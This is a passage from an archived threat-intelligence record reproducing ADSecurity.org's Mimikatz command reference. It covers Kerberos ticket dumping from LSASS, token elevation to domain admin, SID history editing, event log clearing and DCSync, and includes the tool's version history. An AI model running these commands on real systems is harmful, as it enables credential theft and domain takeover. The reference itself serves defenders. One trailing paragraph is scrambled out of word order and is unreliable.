Kerberos tickets and does not\r\nrequire elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all\r\nKerberos tickets on the system can be dumped.\r\nCommand:  mimikatz sekurlsa::tickets exit\r\nDumps all authenticated Kerberos tickets on a system.\r\nRequires administrator access (with debug) or Local SYSTEM rights\r\nThe following screenshot shows dumped password and Kerberos tickets (TGS \u0026 TGT) of another user who is a\r\nDomain Admin (LukeSkywalker).\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 63 of 79\n\nThe following screenshot shows dumped credentials and Kerberos tickets (TGS \u0026 TGT) of another admin\r\n(HanSolo).\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 64 of 79\n\nThe following screenshot shows dumped credentials and Kerberos tickets (TGS \u0026 TGT) for a SQL service\r\naccount (svc-SQLDBEngine01).\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 65 of 79\n\nSEKURLSA::Trust – get trust keys\r\n(I think this is deprecated in favor of lsadump::trust /patch)\r\nSEKURLSA::TSPKG – Lists TsPkg credentials\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 66 of 79\n\nSEKURLSA::Wdigest – List WDigest credentials\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 67 of 79\n\nSERVICE\r\nSERVICE::+  (plus sign)- Install Mimikatz service (‘mimikatzsvc’)\r\nSERVICE::-  (minus sign) – Uninstall Mimikatz service (‘mimikatzsvc’)\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 68 of 79\n\nSERVICE::List – List Services\r\nSERVICE::Me\r\nSERVICE::Preshutdown – preshutdown service\r\nSERVICE::Remove – Remove service\r\nSERVICE::Resume – resume service\r\nSERVICE::Shutdown – shutdown service\r\nSERVICE::Start – Start a service\r\nSERVICE::Stop – Stop service\r\nSERVICE::Suspend – Suspend the service\r\nSID\r\nThe Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.\r\nSID::add – Add a SID to SIDHistory of an object\r\nSID::clear – Clear SIDHistory of an object\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 69 of 79\n\nSID::lookup – Name (/name) or SID (/sid) lookup\r\nSID::modify – Modify object SID of an object\r\nSID::patch – Patch NTDS service\r\nSID::query – Query object by SID or name\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 70 of 79\n\nSTANDARD\r\nSTANDARD::Answer– Answer to the Ultimate Question of Life, the Universe, and Everything.\r\nSTANDARD::Base64 – switch output to base64 output\r\nSTANDARD::CD – change or display current directory\r\nSTANDARD::CLS – Clear screen\r\nSTANDARD::Coffee – show an ASCII image of coffee 🙂\r\nSTANDARD::Exit– quit Mimikatz\r\nSTANDARD::Hostname – Displays system local host\r\nSTANDARD::LocalTime – Displays system local date and time (OJ command)\r\nSTANDARD::Log – Send Mimikatz data to log file\r\nSTANDARD::MarkRus– Pass-the-Hash information. 😉\r\nRemoved in Mimikatz 2.1.1\r\nSTANDARD::Sleep – sleep an amount of milliseconds\r\nSTANDARD::Version – display version information\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 71 of 79\n\nSYSENV\r\nThe Mimikatz SYSENV module provides the ability to manage system environment variables.\r\nSYSENV::List\r\nSYSENV::Get\r\nSYSENV::Set\r\nSYSENV::Del\r\nTOKEN\r\nThe Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including\r\ngrabbing and impersonating existing tokens.\r\nTOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain\r\nadmin token on the box using the Windows API.\r\nRequires Administrator rights.\r\nFind a domain admin credential on the box and use that token: token::elevate /domainadmin\r\nTOKEN::List – list all tokens of the system\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 72 of 79\n\nTOKEN::Revert – revert to process token\r\nTOKEN::Run – Run\r\nTOKEN::Whoami – Display current identity\r\nTS\r\nTS::MultiRDP – (experimental) Patch Terminal Server service to allow multiple users\r\nTS::Sessions – List TS/RDP sessions.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 73 of 79\n\nTS::Remote \r\nVAULT\r\nVAULT::List – list vault credentials\r\nVAULT::Cred – cred\r\nMimikatz Version History\r\nSourced from Mimikatz release Github page\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 74 of 79\n\nMimikatz 2.1.1 – Release Date: 12/20/2017\r\n2.1.1 20171220\r\nClear event logs without the event log logging 1102 “Event Log Cleared”\r\nMimikatz 2.1.1 – Release Date: 12/19/2017\r\n2.1.1 20171219\r\nMimikatz 2.1.1 – Release Date: 12/18/2017\r\n2.1.1 20171218\r\nmimidrv updated for Windows 10 version 1709, (x64)\r\nMimikatz 2.1.1 – Release Date: 11/28/2017\r\n2.1.1 20171128\r\nMimikatz 2.1.1 – Release Date: 11/06/2017\r\n2.1.1 20171106\r\n[fix #107] remove _vscwprintf dependency with mimilove on Windows 2000\r\n[credits] with his work on AD, Vincent Le Toux (@vletoux) is starring as co-author 🙂\r\n[internal] DRSR RPC\r\n[fix] dcsync export as CSV without junk chars between username and NTLM hash\r\nMimikatz 2.1.1 – Release Date: 08/13/2017\r\n2.1.1 20170813\r\ncrypto::extract now supports CAPI \u0026 BCrypt (RSA/AES/DES/3DES/DESX/RC4/RC2…)\r\n[new] lsadump::changentlm to *change* user password/hash to another password/hash\r\n…\r\nMimikatz Release Date: 6/06/2016\r\n2.1 alpha 20160506.1 (oe.eo) edition\r\n[remove] mimikatz lsadump::dcsync req v10 \u0026 rep v9\r\n[future fix] mimikatz lsadump::dcsync pDrsExtensionsInt-\u003edwExtCaps = MAXDWORD32\r\nMimikatz Release Date: 6/06/2016\r\n2.1 alpha 20160606 (oe.eo) edition\r\n[fix #47] mimikatz lsadump::dcsync ‘Fun with flags’ to support AD Privileged Access Management in 2016 TP5\r\n(req v10 \u0026 rep v9)\r\nMimikatz Release Date: 6/04/2016\r\n2.1 alpha 20160604 (oe.eo) edition\r\n[fix #46] MSV structure alignment for Windows 10 \u003e LTSB (LSAISo \u0026 normal)\r\n[enhancement] SID/Name lookup \u0026 LDAP query now with system arg (not only local/current domain)\r\nMimikatz Release Date: 6/01/2016\r\n2.1 alpha 20160601 (oe.eo) edition\r\n[fix] mimikatz lsadump::dcsync now supports AD with recycle bin enabled (thanks to Marcus Rath for report)\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 75 of 79\n\nMimikatz Release Date: 5/25/2016\r\n2.1 alpha 20160525 (oe.eo) edition\r\nlsadump::netsync to ask a DC to send current and previous NTLM hash of DC/SRV/WKS\r\nLots of thanks to @asolino for his help!\r\nMimikatz Release Date: 5/22/2016\r\n2.1 alpha 20160522 (oe.eo) edition\r\n[fix #39] Removing 2 bytes of alignment when using LSAIso with MSV\r\nMimikatz Release Date: 5/06/2016\r\n2.1 alpha 20160506 (oe.eo) edition\r\n[fix #36] Replace wcsicmp by _wcsicmp to avoid warnings with moderns VS\r\nNew SID module\r\n[remove] misc::addsid\r\n[new] sid:: module, to lookup, query, modify, add… (2003/2008r2/2012r2 right now)\r\nMimikatz Release Date: 4/30/2016\r\n2.1 alpha 20160501 (oe.eo) edition\r\n[close #35] DCSync works with renamed domains\r\nThanks to @rmbolger \u0026 @MichaelGrafnetter, DCSync now deals with msDS-ReplicationEpoch / dwReplEpoch\r\nMimikatz Release Date: 3/27/2016\r\n2.1 alpha 20160327 (oe.eo) edition\r\nWelcome to Windows 10 LTSB \u0026 current\r\n[remove] mimidrv \u0026 mimikatz kernel module: Process \u0026 Object callbacks remover are not anymore in the\r\nprogram\r\n[internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current)\r\n[internal] mimidrv: Windows 10 support added\r\n[internal] mimilib WinDBG module \u0026 mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific\r\nanymore (offsets table)\r\n[internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function\r\nMimikatz Release Date: 2/29/2016\r\n2.1 alpha 20160229 (oe.eo) edition\r\nSystem Environment Variables \u0026 other stuff\r\n[new] System Environment Variables user module\r\n[new] System Environment Variables kernel IOCTL for Set\r\n[enhancement] privilege::sysenv\r\n[enhancement] Busylight\r\n[enhancement] misc::skeleton can avoid anti-AES patching for aware clients with /letaes\r\nMimikatz Release Date: 2/17/2016\r\n2.1 alpha 20160217 (oe.eo) edition\r\n[new] crypto::certificates /silent \u0026 /nokey flags\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 76 of 79\n\n[new] crypto::keys /silent flag\r\n[new] kull_m_busylight module now support protocol for new devices\r\nMimikatz Release Date: 2/07/2016\r\nSome DPAPI stuff\r\n[new] vault module now handles more Vault types, Attributes and Properties (with /attributes)\r\n[new] misc::compressme to create a compressed version of mimikatz\r\n[new] dpapi::cred now handles legacy (NT5) multiple credentials\r\n[new] dpapi::wifi \u0026 dpapi::wwan to deal with network profiles\r\n[internal] kuhl_m_vault: vault::list now deals with SID / credentials attributes (with one incorrect align.)\r\n[internal] kull_m_string: removed unused kull_m_string_suspectUnicodeStringStructure\r\n[internal] kull_m_string: added kull_m_string_printSuspectUnicodeString\r\n[internal] kull_m_string: added dirty kull_m_string_quickxml_simplefind\r\n[internal] kull_m_memory: quick compress \u0026 decompress routines\r\n[internal] kull_m_dpapi: added blob flags descriptions\r\n[internal] kull_m_dpapi: fixed blob protection flags description for system\r\n[internal] kull_m_dpapi: removed unused kull_m_dpapi_unprotect_backupkey_with_secret\r\n[internal] kull_m_cred: added legacy (NT5) credentials structures \u0026 routines\r\nMimikatz Release Date: 1/31/2016\r\nLots of internals and 2003 SP1 support\r\n[new] sekurlsa module and its kerberos submodule now work with old 2003 SP1 (live or dump)\r\n[remove] misc::wifi with WLanAPI will be replaced with dpapi::wifi raw access\r\n[fix] crypto::certificate buffer free at the right place\r\n[internal] new kull_m_file Find function with callback\r\n[internal] removed kull_m_file functions (read/write/file exist) with environment-variables, now used for all\r\ncommand-lines\r\n[internal] kull_m_crypto_hash better checks for CRC32 trick\r\n[internal] mimilove for Windows 2000 banner update\r\n[internal] crypto::system now works with buffers (for future registry access)\r\n[internal] kerberos::ptt \u0026 crypto::system call kull_m_file_Find instead of their own implementation\r\n[internal] remove CrtlHandler, from mimikatz main modules, when exiting to let PowerShell clean\r\n[internal] expand command lines environment-variables from mimikatz main modules\r\nMimikatz Release Date: 1/16/2016\r\nCrypto, crypto everywhere…\r\n[new] crypto::providers and crypto::certificates now list provider types\r\n[internal] Removed kull_m_crypto_crc32 routine from crypto module, relies now on cryptdll using\r\nCALG_CRC32 with kull_m_crypto_hash\r\n[internal] Removed incorrect usage of BOOL instead of NTSTATUS in kuhl_m_pac_validationInfo_to_PAC\r\nMimikatz Release Date: 1/11/2016\r\nCrypto \u0026 Kerberos enhancements\r\n[fix] dpapi::capi now deals with AT_SIGNATURE keys\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 77 of 79\n\n[fix] sekurlsa::kerberos / kerberos:: encryption type are now signed\r\n[new] kerberos::ask to ask / save TGS from current TGT\r\n[new] crypto::system to describe/to export Windows System Certificate (cert, crl, ctl, keyid)\r\n[internal] smaller banner for smaller displays\r\n[internal] Copyrights for 2016\r\n[internal] kull_m_file can deal with environment-variable strings in paths\r\n[internal] kull_m_crypto new types for CERT_PROP_*_ID.\r\nMimikatz Release Date: 1/05/2016\r\nMSV \u0026 Kerberos fixes, LSA and Privilege enhancements\r\n[fix] sekurlsa::msv \u0026 mimilib for Windows 10 build 10586\r\n[fix #20] sekurlsa::tickets (display \u0026 export) for NT 6 != Windows 10\r\n[close #16] kerberos::golden now with ~NetBios name in LogonDomainName field of the PAC\r\n[new] privilege module shortcuts (driver, security, tcb, backup, restore) and functions (by id or name)\r\n[new] lsadump::dcsync and lsadump::lsa /inject ‘NTLM-Strong-NTOWF’ in Supplemental Credentials structures\r\n(Windows 2016 TP 4)\r\n[internal] NtSetSystemInformation can now be used in code\r\nMimikatz Release Date: 11/12/2015\r\nmimikatz \u0026 mimilib sekurlsa module ready for Windows 10 build 10586\r\nMimikatz Release Date: 11/09/2015\r\nmimikatz: updated to build with hid.lib\r\nMimikatz Release Date: 10/08/2015\r\nKiwi \u0026 René Coty BusyLight mode\r\nMimikatz Release Date: 10/04/2015\r\nmimikatz + mimilib sekurlsa fix for SmartCard informations\r\nMimikatz Release Date: 9/29/2015\r\nsekurlsa::kerberos – Fix SmartCard pin code\r\nMimikatz Release Date: 9/26/2015\r\nsekurlsa::pth Auto-impersonation (/impersonate)\r\nMimikatz Release Date: 9/16/2015\r\nlsadump::dcsync fix for with 2012r2 AD Recycle Bin\r\nThank you to @asolino, @mubix \u0026 @carnal0wnage !\r\nMimikatz Release Date: 9/06/2015\r\nEnhancements\r\n* Code cleaning\r\nMimikatz Release Date: 9/01/2015\r\nkerberos::golden : fix for groups printing.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 78 of 79\n\nlsadump::dcsync autoselect a domain controller with Directory Service\r\n(DIRECTORY_SERVICE)\r\nMimikatz Release Date: 8/30/2015\r\nCleaning \u0026 few Win10 adaptations\r\nMimikatz Release Date: 8/25/2015\r\nLicence fix on one missed file by AnkhSVN 😉\r\nGlobal licence update, credits to Vincent LE TOUX for DCSync, and lsadump::hash moved to crypto::hash\r\nThis page and all content Copyright © 2015-2016 Sean Metcalf (ADSecurity.org). All Rights Reserved. No\r\nwarranty is implied or provided.\r\n(Visited 740,040 times, 29 visits today)\r\nSource: https://adsecurity.org/?page_id=1821\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 79 of 79\n\nThis registry Digest password key is worth monitoring support which forces in your environment “clear-text” since passwords to an attacker may wish be placed in LSASS to set it to 1 to on any version enable of Windows\nfrom Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a\n“UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems\nmay indicate a problem.     \n   Page 3 of 79   \n\n   https://adsecurity.org/?page_id=1821 \nDPAPI::Vault -VAULT test  \nDPAPI::WIFI -WIFI test (XML profile required-reference Ben’s spreadsheet)\nDPAPI::WWAN -WWAN test (XML profile required -reference Ben’s spreadsheet)\nEVENT    \nEVENT::Clear -Clear an event log  \n   Page 17 of 79\n\n  https://adsecurity.org/?page_id=1821 \nSEKURLSA::Dpapi -list cached MasterKeys \nSEKURLSA::DpapiSystem -DPAPI_SYSTEM  secret\nSEKURLSA::Ekeys -list Kerberos encryption keys\n   Page 51 of 79\n\n  https://adsecurity.org/?page_id=1821 \nSEKURLSA::Trust -get trust keys  \n(I think this is deprecated in favor of lsadump::trust /patch)\nSEKURLSA::TSPKG -Lists TsPkg credentials \n   Page 66 of 79\n\n  https://adsecurity.org/?page_id=1821 \nSERVICE   \nSERVICE::+ (plus sign)-Install Mimikatz service (‘mimikatzsvc’)\nSERVICE::- (minus sign)-Uninstall Mimikatz service (‘mimikatzsvc’)\n   Page 68 of 79",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://adsecurity.org/?page_id=1821"
	],
	"report_names": [
		"?page_id=1821"
	],
	"threat_actors": [],
	"ts_created_at": 1775434026,
	"ts_updated_at": 1775791294,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dc49dc8138e64eca0a4774053cc9b3c3244adf43.pdf",
		"text": "https://archive.orkl.eu/dc49dc8138e64eca0a4774053cc9b3c3244adf43.txt",
		"img": "https://archive.orkl.eu/dc49dc8138e64eca0a4774053cc9b3c3244adf43.jpg"
	}
}